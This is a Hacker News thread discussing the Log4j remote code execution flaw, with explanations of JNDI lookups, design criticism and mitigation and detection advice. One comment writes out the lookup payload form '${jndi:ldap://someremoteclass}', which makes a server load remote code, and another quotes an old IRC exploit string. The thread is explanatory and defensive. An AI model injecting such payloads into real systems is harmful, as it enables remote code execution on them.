item 29504755

Log4j RCE Found

1385 points | usmannk | 4 years ago | lunasec.io

503 comments

lewisjoe | 4 years ago
To folks wondering what the issue is about, I'll give a short summary that I myself needed.

Typically, a logging library has one job: swallow the string as if it were a black box and spit it out elsewhere according to the provided configuration. Log4j, though, doesn't treat strings as black boxes. It inspects their contents and checks whether they contain any "variables" that need to be resolved before spitting them out.

Now, there are a bunch of ways to interpolate "variables" into log content. For example, something like "Logging from ${java:vm}" will print "Logging from Oracle JVM". I'm not sure, but you get the idea.
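To make the "variables" idea concrete, here is a minimal sketch of prefix-based `${prefix:key}` interpolation. It is a toy, not Log4j's implementation; the class name and the `sys` resolver backed by `System.getProperty` are assumptions for illustration (loosely in the spirit of Log4j's system-properties lookup).

```java
import java.util.Map;
import java.util.function.Function;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

// Toy model of "${prefix:key}" lookups; NOT Log4j's actual code.
class ToyLookupInterpolator {
    // Matches ${prefix:key}, e.g. ${sys:java.vm.name}
    private static final Pattern VAR = Pattern.compile("\\$\\{([a-z]+):([^}]*)\\}");

    // Resolver functions keyed by prefix (hypothetical registry)
    private final Map<String, Function<String, String>> resolvers;

    ToyLookupInterpolator(Map<String, Function<String, String>> resolvers) {
        this.resolvers = resolvers;
    }

    String interpolate(String message) {
        Matcher m = VAR.matcher(message);
        StringBuilder out = new StringBuilder();
        while (m.find()) {
            Function<String, String> resolver = resolvers.get(m.group(1));
            String resolved = (resolver == null) ? null : resolver.apply(m.group(2));
            // Unknown prefixes or unresolvable keys are left as the original text
            String value = (resolved == null) ? m.group() : resolved;
            m.appendReplacement(out, Matcher.quoteReplacement(value));
        }
        m.appendTail(out);
        return out.toString();
    }

    public static void main(String[] args) {
        Function<String, String> sys = System::getProperty;
        ToyLookupInterpolator t = new ToyLookupInterpolator(Map.of("sys", sys));
        // Prints something like "Logging from OpenJDK 64-Bit Server VM"
        System.out.println(t.interpolate("Logging from ${sys:java.vm.name}"));
    }
}
```

The key point is that the message text itself decides which resolver runs; once one of those resolvers can reach the network (as JNDI can), untrusted text can trigger network calls.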

One way to resolve a variable using a custom Java resolver is to look it up through a remote class hosted on some LDAP server, say "${jndi:ldap://someremoteclass}" (I'm still not quite sure why LDAP comes into the picture). It turns out that by including "." in some part of the URL to this remote class, Log4j lets down its guard, simply connects to that server, and dynamically loads the class file.

The fix introduces ways to configure an allowed set of hosts/protocols/etc. and forces Log4j to go through this configuration, so that these dynamic resolutions don't land on a random/evil server.
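The allowlist idea can be sketched as a gate that parses the lookup URL and only permits explicitly listed schemes and hosts. This is a hypothetical illustration of the concept, not the code or the configuration property names from the actual Log4j fix; the class and method names are made up.

```java
import java.net.URI;
import java.net.URISyntaxException;
import java.util.Locale;
import java.util.Set;

// Hypothetical allowlist gate for lookup URLs; not Log4j's real implementation.
class JndiAllowlist {
    private final Set<String> allowedSchemes;
    private final Set<String> allowedHosts;

    JndiAllowlist(Set<String> allowedSchemes, Set<String> allowedHosts) {
        this.allowedSchemes = allowedSchemes;
        this.allowedHosts = allowedHosts;
    }

    boolean permits(String url) {
        try {
            URI uri = new URI(url);
            String scheme = uri.getScheme();
            String host = uri.getHost();
            // Deny unless both scheme and host are present and explicitly allowed
            return scheme != null && host != null
                && allowedSchemes.contains(scheme.toLowerCase(Locale.ROOT))
                && allowedHosts.contains(host.toLowerCase(Locale.ROOT));
        } catch (URISyntaxException e) {
            return false; // unparseable input is denied, never "best effort" resolved
        }
    }
}
```

Denying by default (unknown scheme, missing host, or parse failure all return false) is the important design choice; an allowlist that fails open would not help here.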

brabel | 4 years ago
These "special" strings that Log4j parses must be in the format string, though, right?

External Strings should normally be logged as parameters, not included in the format String. For example:

    // this is ok
    log.debug("user-agent={}", userAgent);

    // this is bad
    log.debug("user-agent=" + userAgent);
Does this vulnerability still work in the first case?

EDIT: the answer is yes, just tried it myself.
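One way to see why parameterized logging doesn't help: if placeholders are substituted first and the lookup pass then runs over the already formatted message, user input containing `${...}` gets resolved anyway. The toy below models that ordering, which appears consistent with what brabel observed; it is not Log4j's code, and the class and method names are hypothetical.

```java
import java.util.regex.Matcher;
import java.util.regex.Pattern;

// Toy model: format first, then scan the result for ${...}. Not Log4j's code.
class ToyFormatThenLookup {
    private static final Pattern VAR = Pattern.compile("\\$\\{([^}]*)\\}");

    // Step 1: replace each "{}" with the next argument (SLF4J-style placeholders)
    static String format(String pattern, Object... args) {
        StringBuilder sb = new StringBuilder();
        int argIdx = 0, from = 0, at;
        while ((at = pattern.indexOf("{}", from)) >= 0 && argIdx < args.length) {
            sb.append(pattern, from, at).append(args[argIdx++]);
            from = at + 2;
        }
        return sb.append(pattern.substring(from)).toString();
    }

    // Step 2: scan the *formatted* text; a real resolver might hit the network here
    static String resolveLookups(String formatted) {
        Matcher m = VAR.matcher(formatted);
        StringBuilder out = new StringBuilder();
        while (m.find()) {
            m.appendReplacement(out, Matcher.quoteReplacement("<resolved " + m.group(1) + ">"));
        }
        m.appendTail(out);
        return out.toString();
    }

    static String log(String pattern, Object... args) {
        return resolveLookups(format(pattern, args));
    }
}
```

With this ordering, `log("user-agent={}", userAgent)` is exactly as exposed as string concatenation, because by step 2 the parameter has already become part of the text being scanned.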

jameshart | 4 years ago
Even the variable interpolation is a security risk.

If I have the ability to trigger execution of a process on some service, and one of the things it does is return the logs from that process to me, it might be somewhat surprising to the host of that process that if I pass in "${java:vm}" as input, the logs might leak which version of the JVM it's running...

What else might you be able to get a system to leak to you if you can control input and read log output?

spullara | 4 years ago
This is just stupid. Logging should not do any side effects except writing to the log.
twic | 4 years ago
> Turns out, by including "." in some part of the URL to this remote class, Log4j lets off its guard & simply looks up to that server and dynamically loads the class file.

No, it doesn't. That was disabled by default in 2009, and it is disabled by default in every release of Java 8 or later: https://github.com/openjdk/jdk8u/commit/006e84fc77a582552e71...

Unless I am mistaken, I don't believe the attack as described by LunaSec actually works against a default-configured JVM released any time in the last decade.

grrrrrrreat | 4 years ago
Does this affect SLF4J wrappers over log4j as well?
creatonez | 4 years ago
This exploit is quite severe on Minecraft Java Edition. Anyone can send a chat message which exploits everyone on the server and the server itself, because every chat message is logged. It's been quite a rollercoaster over the past few hours, working out the details of how to protect members of servers, and informing players (many of whom use modded clients that don't receive the automatic Mojang patches) of how to protect themselves. Some of the major servers like 2b2t and Mineplex have shut down, and larger servers that haven't shut down yet are pure chaos right now.
mschuster91 | 4 years ago
> Anyone can send a chat message which exploits everyone on the server and the server itself, because every chat message is logged. ... Some of the major servers like 2b2t and Mineplex have shut down, and larger servers that haven't shut down yet are pure chaos right now.

Why does this behavior remind me of the old "dcc send start keylogger 0 0 0" exploit of IRC some fifteen years ago?

bullen | 4 years ago
So is this fixed in 1.18?
kelnos | 4 years ago
On one hand I want to be more forgiving of this, because log4j is very old, and likely this feature was introduced well before we all had a collective understanding of how fiddly and difficult security can be, and how attackers will go to extreme effort to compromise our services.

But at the same time... c'mon. A logging framework's job is to ship strings to stdout or files or something. String interpolation should not be this complicated, flexible, whatever you want to call it. The idea that a logging framework (!) could even have an RCE makes me want to scream... the feature set that leads us to that even being possible just weeps "overengineered".

michaelt | 4 years ago
> A logging framework's job is to ship strings to stdout or files or something.

I've seen people (including here on HN) dismiss libraries as "abandoned" when they went a year without a release.

The software industry will never get bug-free, feature-complete software so long as we're selecting for the opposite.

JanecekPetr | 4 years ago
No, this is about log4j2, which is kinda new (2.0.0 was released in 2014). Otherwise, yeah, this is terrible, especially since the tag doesn't even have to be in the format string.
ta4873588478 | 4 years ago
Yeah, this is disappointing to hear about and isn't a good look for the people involved. At the very least it should've been a separate module or an opt-in configuration parameter. Who the hell needs a JNDI lookup in a log statement? If you do, do it yourself and then log it. Disappointing.
wbl | 4 years ago
The Ware report is over 50 years old. String formatting bugs are about 20 or 30.
jrockway | 4 years ago
So a lot of people sound mad that the logging library is parsing the inputs, and maybe they should be, but the truly paranoid should be aware that your terminal also parses every byte given to it (to find in-band signalling for colors, window titles, where the cursor should be, etc.). This means that if a malicious user can control log lines, they can also hide stuff if you're looking at the logs in a terminal. Something to be aware of!
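As a rough illustration of the terminal point: a carriage return moves the cursor back to column 0, and on many terminals `ESC[2K` erases the current line, so a crafted value can visually hide whatever was printed before it. A minimal, hypothetical defense is to escape control characters before a log line ever reaches a terminal; the class name and the exact escaping scheme are assumptions, not any particular library's behavior.

```java
// Hypothetical sanitizer: renders ASCII control characters as visible hex escapes.
class LogLineSanitizer {
    static String sanitize(String s) {
        StringBuilder sb = new StringBuilder(s.length());
        for (int i = 0; i < s.length(); i++) {
            char c = s.charAt(i);
            // C0 controls (including tab, CR, LF, ESC, BEL) and DEL become visible text
            if (c < 0x20 || c == 0x7f) {
                sb.append(String.format("\\u%04x", (int) c));
            } else {
                sb.append(c);
            }
        }
        return sb.toString();
    }

    public static void main(String[] args) {
        // Printed raw, the CR plus erase-line sequence can hide the first half
        String hostile = "login failed for mallory\r\u001b[2Klogin ok for alice";
        System.out.println(sanitize(hostile));
    }
}
```

This deliberately also escapes tabs and newlines, which keeps one log event on one line at the cost of slightly uglier output for legitimate multi-line messages.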
hawk_ | 4 years ago
While that's an interesting vector for attack, is it realistically an issue? Terminals are run as root all the time. I would guess any mainstream ones are well reviewed to not have such exploits work. Are you aware of any actual attacks exploiting terminal parsing in the wild?
dystroy | 4 years ago
But you log strings, not bytes, meaning that the escape sequences are escaped, unless there's a severe bug in the logger.
400thecat | 4 years ago
Can you show an example of how that would work?
testplzignore | 4 years ago
I don't get what the point of this feature even is. What is a legitimate reason for a logging library to make network requests based on the contents of what is being logged? And is this enabled out-of-the-box with log4j2?
BeefWellington | 4 years ago
> I don't get what the point of this feature even is.

This is basically the response to every type of vulnerability that is based on some spec nobody's read. Same deal with XML entity parsing. Why should it make web requests, FTP requests, etc.?

At some point someone had it as a requirement and everyone else gets to live with it.

BinaryRage | 4 years ago
log4j2 supports lookups, which allows you to add additional logging context:

https://logging.apache.org/log4j/2.x/manual/lookups.html

The problem here is the JNDI lookup because for historical reasons there is code in these providers which causes Java to deserialize and load bytecode if it's found in a result for a lookup against an LDAP server. That exploit was partially fixed in the JDK in 2008, then in 2018, but there are multiple naming providers that are affected.

Yes, it's enabled by default before 2.15.0, released today to mitigate this issue.

nijave | 4 years ago
I'm guessing some sort of auditing or routing functionality. For instance, you have debug logs going to some development server and login events going to some audit server.

I don't have experience with this feature, but there are similar use cases in log shipping utilities like fluentd.

Edit: I read the other link and it looks like some sort of poorly designed RPC functionality or something shrug

Edit 2: Reading https://docs.oracle.com/javase/7/docs/technotes/guides/jndi/..., it sounds like it's a form of service discovery of sorts. You talk to a registry server and it provides some object pointing to the real destination.

est | 4 years ago
> What is a legitimate reason for a logging library to make network requests based on the contents of what is being logged

I encountered a similar problem recently. My own logger can get the current container/pod IP address, but it's painful to tell which host is which from the IPs in the logs, so I had to do a manual DNS lookup to include a hostname instead. I was hoping the logger could do the lookup automatically and cache it for me.
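A less risky way to get what est describes is to resolve the name once, outside of message formatting, and reuse it, so no log line ever triggers a network call. A minimal sketch using the lazy holder idiom; it assumes `InetAddress.getLocalHost().getHostName()` returns the name you want, which may not hold in every container setup, and the class name is hypothetical.

```java
import java.net.InetAddress;
import java.net.UnknownHostException;

// Hypothetical helper: resolve the local hostname once, then reuse it.
class HostnameCache {
    // Initialized on first use by the JVM's class-initialization guarantees
    private static final class Holder {
        static final String HOSTNAME = resolve();
    }

    private static String resolve() {
        try {
            return InetAddress.getLocalHost().getHostName();
        } catch (UnknownHostException e) {
            return "unknown-host"; // fall back rather than break logging
        }
    }

    static String hostname() {
        return Holder.HOSTNAME;
    }

    // Prefix a message with the cached hostname; the message itself is not interpreted
    static String prefix(String message) {
        return "[" + hostname() + "] " + message;
    }
}
```

The trade-off is that the name is fixed for the life of the process, which is usually what you want for a container but not for a host whose name changes at runtime.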

jimrandomh | 4 years ago
I try to follow a rule with libraries: if a library causes more trouble than the implementation effort it would take to recreate its functionality from scratch (or rather, the portion of its functionality that is used in practice), then it's time to purge that library from projects and never use it again.

The part of log4j functionality that gets used in practice, most of the time, is just a wrapper around printf which adds a timestamp and a log-level. This is very quick and easy to write. A library in this role should have zero RCEs, ever in its entire lifetime, or it is unfit for purpose.
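For a sense of scale, the "printf plus timestamp plus level" core really is small. A minimal sketch with hypothetical names; note that the formatted text is written out and never re-scanned for `${...}`, and that the format string must itself be trusted, since passing untrusted text as `fmt` would be a format-string bug of its own.

```java
import java.time.Instant;

// Hypothetical minimal logger: timestamp + level + String.format, nothing else.
class TinyLogger {
    enum Level { DEBUG, INFO, WARN, ERROR }

    private final Level threshold;

    TinyLogger(Level threshold) {
        this.threshold = threshold;
    }

    // Pure rendering step, separated out so it is easy to test
    String render(Instant ts, Level level, String fmt, Object... args) {
        return ts + " " + level + " " + String.format(fmt, args);
    }

    void log(Level level, String fmt, Object... args) {
        if (level.compareTo(threshold) < 0) return; // below threshold: drop
        System.out.println(render(Instant.now(), level, fmt, args));
    }
}
```

Usage: `new TinyLogger(TinyLogger.Level.INFO).log(TinyLogger.Level.WARN, "user-agent=%s", userAgent);`. As the replies below point out, this leaves out rotation, async output, routing, and masking, which is where most of a real library's weight comes from.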

nostoc | 4 years ago
> just a wrapper around printf which adds a timestamp and a log-level

That's a pretty naive view of what's needed in an enterprise logging solution.

logging to files, separate logging, remote logging, log rotation, logging 3rd party code...

Of course if you're simply sending lines to the terminal in a simple program you don't need log4j.

But once you scale, you'd be spending 3 weeks implementing what you get for free in log4j.

shepherdjerred | 4 years ago
I disagree strongly with this.

You're better off learning the de-facto libraries of your language. Your employer, or any production application you're going to work on is probably going to use one of these libraries.

I learned the most common Java libraries when writing personal projects -- Lombok, log4j, Guava, Gson, Jackson, Netty, etc.

I had a significantly gentler learning curve at my first job. We used these common libraries, so I had a very easy time when I had to edit log filtering or fix log rotations of our applications.

mjr00 | 4 years ago
> The part of log4j functionality that gets used in practice, most of the time, is just a wrapper around printf which adds a timestamp and a log-level.

I... don't think this is true? When I was using it we used log rotation, log truncation, configurable output formatting that could be made consistent across the code or specialized in certain parts of the code base that required more detailed logging, masking credit card numbers and emails in log statements, and doing all of the logging async to not impact performance. And I'm sure there are features it has which I didn't mention.
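Masking card numbers is one of those features that looks trivial but has edge cases. mjr00 doesn't say how it was done in their setup; the sketch below is one hypothetical approach that masks runs of 13 to 16 consecutive digits except the last four. It ignores spaces and dashes inside numbers and skips any Luhn check, both assumptions you would likely revisit in practice.

```java
import java.util.regex.Matcher;
import java.util.regex.Pattern;

// Hypothetical masker: hides all but the last 4 digits of 13-16 digit runs.
class CardNumberMasker {
    // Not preceded or followed by another digit, so longer runs are left alone
    private static final Pattern PAN = Pattern.compile("(?<!\\d)\\d{9,12}(\\d{4})(?!\\d)");

    static String mask(String message) {
        Matcher m = PAN.matcher(message);
        StringBuilder out = new StringBuilder();
        while (m.find()) {
            String stars = "*".repeat(m.group().length() - 4);
            // Replacement contains only '*' and digits, so no escaping is needed
            m.appendReplacement(out, stars + m.group(1));
        }
        m.appendTail(out);
        return out.toString();
    }
}
```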

eyelidlessness | 4 years ago
I haven’t used log4j (or a JVM language) for several years but IIRC the most common usage was printf + agnostic but reliable output, commonly adapted to multiple SaaS solutions and usable in dev, and outputting formats that are searchable eg in Logstash. This is roughly the same as I’ve encountered on Node where I’ve also had to remind myself that it isn’t a simple printf -> stdout, even if it looks and feels like it is.

The complexity in logging libraries like this is much greater than it seems like it should be, specifically because they’re designed to abstract a lot of integration use cases in a way that feels like it just works. Marshaling data between even a few services introduces a lot of potential for mistakes.

physicles | 4 years ago
For containers that's especially true because the best practice is just to write to stdout/stderr. This sidesteps a whole host of issues related to dealing with log files.
didibus | 4 years ago
I think there's a tradeoff. Your implementation is also likely to have vulnerabilities you haven't caught, but it would be more obscure and maybe people wouldn't bother as much finding exploits for it. On the other hand, using a popular commonly used library, it will get tested for vulnerabilities a lot more thoroughly, reported and eventually patched, so it is possibly more hardened.
BatteryMountain | 4 years ago
Same mindset here.

I've always written my own loggers; it doesn't even take more than an hour in C#-land. log4net is quite a beast, so I avoid it. Serilog is pretty cool, though, but in most cases I just roll my own. Other than that, .NET Core comes with its own loggers and logging abstractions, so half the time you don't have to write your own anymore, and if you do, it's super pluggable.

adamc | 4 years ago
Just a note of appreciation for this thread. One of the things we can get out of debacles like this is a reassessment of how we should design software, and what we should look for in software designed by others. Food for thought.
jsiepkes | 4 years ago
Logback has an interesting commit[1]: "disassociate logback from log4j 2.x as much as possible".

They also updated their landing page [2]: "Logback is intended as a successor to the popular log4j project, picking up where log4j 1.x leaves off. Fortunately, logback is unrelated to log4j 2.x and does not share its vulnerabilities."

Can't say I blame them.

[1] https://github.com/qos-ch/logback/commit/b810c115e363081afc7...

[2] http://logback.qos.ch/

EDIT: Removed Apache from Apache Logback since, as correctly pointed out, it's not an Apache project.

spuz | 4 years ago
Thanks for the write-up but I have a few questions. Why does log4j's .log() method attempt to parse the strings sent to it? It is the last thing I would expect it to do. Is the part in the sample code where the user's input is output back to them part of the exploit? If so how does it fit into the attack? What will the attacker see beyond the string they originally sent as input?

Could you update your mitigation steps to explain how to set the "log4j2.formatMsgNoLookups" config? It's not clear whether this is a property that goes into the log4j config or into the JVM args.
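For readers with the same question: `log4j2.formatMsgNoLookups` is a Java system property, so the usual ways to set it are `-Dlog4j2.formatMsgNoLookups=true` in the JVM arguments or the environment variable `LOG4J_FORMAT_MSG_NO_LOOKUPS=true`. As far as I know it is only honored by Log4j 2.10 and later, and a later advisory (CVE-2021-45046) said it does not cover every configuration, so upgrading is the safer fix. If you can't change the launch command, a hedged fallback is to set it programmatically at the very top of `main`, before anything initializes Log4j; the class and method names below are hypothetical.

```java
// Hypothetical bootstrap: set the property before any Log4j class is loaded.
class NoLookupsBootstrap {
    static final String PROP = "log4j2.formatMsgNoLookups";

    // Returns whether the flag is effectively "true" after this call
    static boolean ensureNoLookups() {
        if (System.getProperty(PROP) == null) {
            // Only effective if this runs before Log4j reads its configuration
            System.setProperty(PROP, "true");
        }
        // An explicit -Dlog4j2.formatMsgNoLookups=false on the command line is respected
        return Boolean.parseBoolean(System.getProperty(PROP));
    }

    public static void main(String[] args) {
        ensureNoLookups();
        // Only after this point create loggers, e.g. via LogManager.getLogger(...)
    }
}
```

Setting it in code is fragile: any static logger field in a class loaded earlier can initialize Log4j first, which is why the command-line flag is generally preferred.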

ievans | 4 years ago
If you'd like to detect whether you're affected by this dynamically, it looks like https://github.com/google/tsunami-security-scanner-plugins/i... will eventually make it into Google's dynamic scanner: https://github.com/google/tsunami-security-scanner (I bet it would be easy to write a plugin for https://github.com/projectdiscovery/nuclei as well.)

To see if there are injection points statically, I work on a tool (https://github.com/returntocorp/semgrep) that someone else already wrote a check with: https://twitter.com/lapt0r/status/1469096944047779845 or look for the mitigation with `semgrep -e '$LOGGER.formatMsgNoLookups(true)' --lang java`. For the mitigation, the string should be unique enough that just ripgrep works well too.
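Another static check that was widely used is to look inside your jars for Log4j's JNDI lookup class, `org/apache/logging/log4j/core/lookup/JndiLookup.class`. A minimal sketch with `java.util.zip.ZipFile`; the class name is hypothetical, it does not descend into nested jars (fat jars, WARs, EARs), and a hit only tells you `log4j-core` is present (patched versions still ship the class), so treat it as a pointer for investigation rather than a verdict.

```java
import java.io.IOException;
import java.util.zip.ZipFile;

// Hypothetical scanner: flags archives that directly contain Log4j's JndiLookup class.
class JndiLookupScanner {
    static final String JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class";

    static boolean containsJndiLookup(String jarPath) throws IOException {
        try (ZipFile zip = new ZipFile(jarPath)) {
            return zip.getEntry(JNDI_LOOKUP) != null;
        }
    }

    public static void main(String[] args) throws IOException {
        for (String path : args) {
            String verdict = containsJndiLookup(path) ? "JndiLookup present" : "not found";
            System.out.println(path + ": " + verdict);
        }
    }
}
```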

lgrapenthin | 4 years ago
It's just incredible how bloated Log4J is. You'd think a logging library would be rather lightweight and straightforward to configure, no?

No, it is one of those efforts that suffer from their underlying problem being so well understood that, apparently, everybody working on it feels compelled to "enrich" it with more options, config layers, adapters, extensions.

Pxtl | 4 years ago
I give up.

It's got as many eyeballs in it as you could ever hope, and it's as mature as any piece of software ever could be.

And its job is to write text to files. It's basically a wrapper around printf.

How did this get screwed up?

Security is impossible.

rank0 | 4 years ago
I’m amazed at the reaction here. Lots of comments ITT about how this library is horrible and logging should be a solved problem from a security perspective. Similar commentary was here recently regarding some unsafe docker default.

Developers always want abstractions to make programming easier, but they never consider the cost of using those abstractions. It’s so convenient to place all the burden on library authors but you’re the one logging client supplied input in the first place!

Put a regex whitelist on your inputs wherever there’s a trust boundary. How come devs should never have to consider security but FOSS package maintainers do?
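A minimal sketch of the kind of allowlist rank0 suggests, applied at a trust boundary before a value is logged. The permitted character set and length limit are hypothetical choices; the point is that `$`, `{`, `}` and `:` are simply not in the set, so lookup syntax can never get through.

```java
import java.util.regex.Pattern;

// Hypothetical input allowlist: letters, digits, space, dot, underscore, hyphen; 1-64 chars.
class InputAllowlist {
    private static final Pattern ALLOWED = Pattern.compile("[A-Za-z0-9 ._-]{1,64}");

    static boolean isAllowed(String input) {
        // matches() requires the whole string to fit the pattern
        return input != null && ALLOWED.matcher(input).matches();
    }
}
```

The catch is that real-world fields are messier than this: a genuine User-Agent contains `/`, `(` and `;`, so a strict allowlist either rejects legitimate traffic or has to be widened field by field, which is part of why people expected the logger not to interpret its input in the first place.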

wielebny | 4 years ago
This is exploitable in applications that use the Elastic Stack with Logstash as a log processor. I've just been able to reproduce it in a Magento e-commerce site with the payload inserted into the payment details.
robertelder | 4 years ago
I've been thinking about this since I saw it here on HN yesterday, and I can't help but entertain the idea that this might end up being 'the worst software security flaw ever'.